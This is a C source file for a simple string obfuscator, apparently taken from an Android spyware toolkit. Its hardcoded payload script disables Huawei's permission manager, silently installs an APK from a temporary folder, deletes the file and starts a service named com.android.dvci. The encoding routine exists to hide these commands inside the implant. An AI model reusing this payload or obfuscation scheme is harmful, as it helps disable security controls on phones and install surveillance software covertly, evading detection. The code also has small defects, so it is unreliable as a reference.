obfuscator/obf_sc2.c
/*
* Simple string obfuscation - Quequero 2013
*
* Obfuscated string format:
* 1-byte key. 1-byte module. 1-byte length, <string>
*/
#include <string.h>
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
char *sc = {"if [ -f \"/system/app/HwPermissionManager.apk\" ]\nthen\npm disable com.huawei.permissionmanager\nfi\nsleep 1\npm install /data/local/tmp/tmp\nrm /data/local/tmp/tmp\nam startservice -n com.android.dvci/.ServiceMain\nsleep 2\n"};
// <search string> <replace string> <string to search>
unsigned char *str_replace(unsigned char *search , unsigned char *replace , unsigned char *subject) {
unsigned char *p = NULL , *old = NULL , *new_subject = NULL ;
int c = 0 , search_size;
search_size = strlen(search);
for (p = strstr(subject , search) ; p != NULL ; p = strstr(p + search_size , search)) {
c++;
}
c = (strlen(replace) - search_size )*c + strlen(subject);
new_subject = malloc(c);
strcpy(new_subject , "");
old = subject;
for (p = strstr(subject , search) ; p != NULL ; p = strstr(p + search_size , search)) {
strncpy(new_subject + strlen(new_subject) , old , p - old);
strcpy(new_subject + strlen(new_subject) , replace);
old = p + search_size;
}
strcpy(new_subject + strlen(new_subject) , old);
return new_subject;
}
int obfuscate(unsigned char *s, unsigned char *d) {
unsigned int seed;
unsigned char key, mod;
unsigned char *rep = NULL;
unsigned char nl[] = "\n";
unsigned char tb[] = "\t";
unsigned char cr[] = "\r";
int i, j, len;
srandom(time(0));
seed = random();
key = (unsigned char)(seed & 0x000000ff);
mod = (unsigned char)((seed & 0x0000ff00) >> 8);
rep = str_replace("\\n", nl, s);
/*rep = str_replace("\\t", tb, rep);
rep = str_replace("\\r", cr, rep);
printf("LENGTH rep3: %d\n", strlen(rep));*/
len = strlen(rep);
if (len > 255) {
printf("String too long\n");
return;
}
d[0] = key;
d[1] = mod;
d[2] = (unsigned char)len ^ key ^ mod;
for (i = 0, j = 3; i < len; i++, j++) {
d[j] = rep[i] ^ key;
d[j] += mod;
d[j] ^= mod;
}
return len;
}
unsigned char* deobfuscate(unsigned char *s) {
unsigned char key, mod, len;
int i, j;
static unsigned char d[256]; // E' zozza ma cosi' non serve la free()
key = s[0];
mod = s[1];
len = s[2] ^ key ^ mod;
// zero terminate the string
memset(d, 0x00, len + 1);
for (i = 0, j = 3; i < len; i++, j++) {
d[i] = s[j] ^ mod;
d[i] -= mod;
d[i] ^= key;
}
d[len] = 0;
return d;
}
int main(int argc, char *argv[]) {
unsigned char *buf, *test;
int i, obf_len;
if (argc < 2) {
printf("Usage: %s <string>\n", argv[0]);
return 0;
}
argv[1] = sc;
printf("len %d\n", (int)strlen(argv[1]));
if (strlen(argv[1]) > 255) {
printf("String too long\n");
return 0;
}
obf_len = strlen(argv[1]) + 3;
buf = (unsigned char *)malloc(obf_len);
memset(buf, 0x00, obf_len);
obf_len = obfuscate(argv[1], buf);
obf_len += 3;
printf("unsigned char obf_string[] = \"");
for (i = 0; i < obf_len; i++) {
printf("\\x");
printf("%02x", buf[i]);
}
//printf("\"; // \"%s\"\n", argv[1]);
//test = deobfuscate(buf);
printf("Deobfuscated string: \"%s\"\n", deobfuscate(buf));
//free(buf);
return 0;
}